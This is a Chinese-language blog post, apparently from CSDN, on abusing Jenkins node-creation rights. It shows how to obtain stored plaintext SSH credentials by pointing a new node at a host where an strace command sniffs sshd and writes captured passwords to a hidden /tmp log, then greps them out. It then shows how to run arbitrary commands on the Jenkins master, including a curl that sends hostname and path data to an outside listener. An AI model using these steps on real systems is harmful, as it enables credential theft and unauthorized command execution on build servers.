• Jenkins :添加node权限获取凭据、执行命令


    拥有Jenkins agent权限的账号可以对node节点进行操作,通过添加不同的node可以让流水线项目在不同的节点上运行,安装Jenkins的主机默认作为master节点。

    1693206336_64ec47407d15d193c5422.png!small?1693206336902

    1.Jenkins 添加node获取明文凭据

    通过添加node节点,本地监听ssh认证,选则凭据(明文)进行ssh认证,拿到密码。

    1.新建节点-manage nodes功能

    1693205859_64ec45635aa079a5ec1b6.png!small?1693205859758

    1693205872_64ec45700bc3f13e1572b.png!small?1693205872433

    2.填写工作目录,选择通过SSH进行远程节点身份认证,选择抓取带*号的凭据,host key选择不进行验证:

    1693205887_64ec457f8281bcac13859.png!small?1693205887940

    3.主机监听:这里监听主机ssh使用的是strace后门,实际也可以使用其他方式进行:

    (strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

    4.保存节点配置, Jenkins将对主机进行ssh请求:

    1693205950_64ec45be79b8523c71e55.png!small?1693205950910

    node节点认证日志(账号密码方式):

    1693205961_64ec45c94123ffd95eb8d.png!small?1693205961786

    5. 查看接受结果,这种方式获得的密码需要自行判断下起始位置

    grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

    1693205976_64ec45d806a0b35142d02.png!small?1693205976368

    2.通过添加节点执行命令

    同样的,在添加节点时可以配置在master上执行命令去进行其他节点认证,也就可以在master上执行恶意命令了。

    注意:这里执行curl命令时不能使用``直接执行系统命令,所以利用时需要更换其他方式。

    1. curl -k ip:9090/`hostname`/`pwd`
    2. env

    添加节点时也可以从控制器执行命令,Launch method 选择 通过在master上执行命令的方式:

    1693205993_64ec45e98a52e744062bf.png!small?1693205994177

    保存然后launch agent:

    1693206122_64ec466a0280b1d06eaf0.png!small?1693206122365

    可以在Log里面看到命令env的输出:

    1693206115_64ec46630c4a99a6e864e.png!small?1693206115957

  • 相关阅读:
    webpack的简单使用
    x265 帧间预测
    面试突击:Bean 作用域是啥?它有几种类型?
    java+ssm+mysql电梯管理系统
    第1章 Java基础(一)
    Linux有多重要?冲30万年薪Linux学习入门指南
    双亲委派模型
    websocket与Socket的区别
    setup里面 计算属性与监视
    使用VC++实现分段线性变换,直方图均衡化、锐化处理(使用拉普拉斯算子)
  • 原文地址:https://blog.csdn.net/qwsdfFDFSAD/article/details/132866246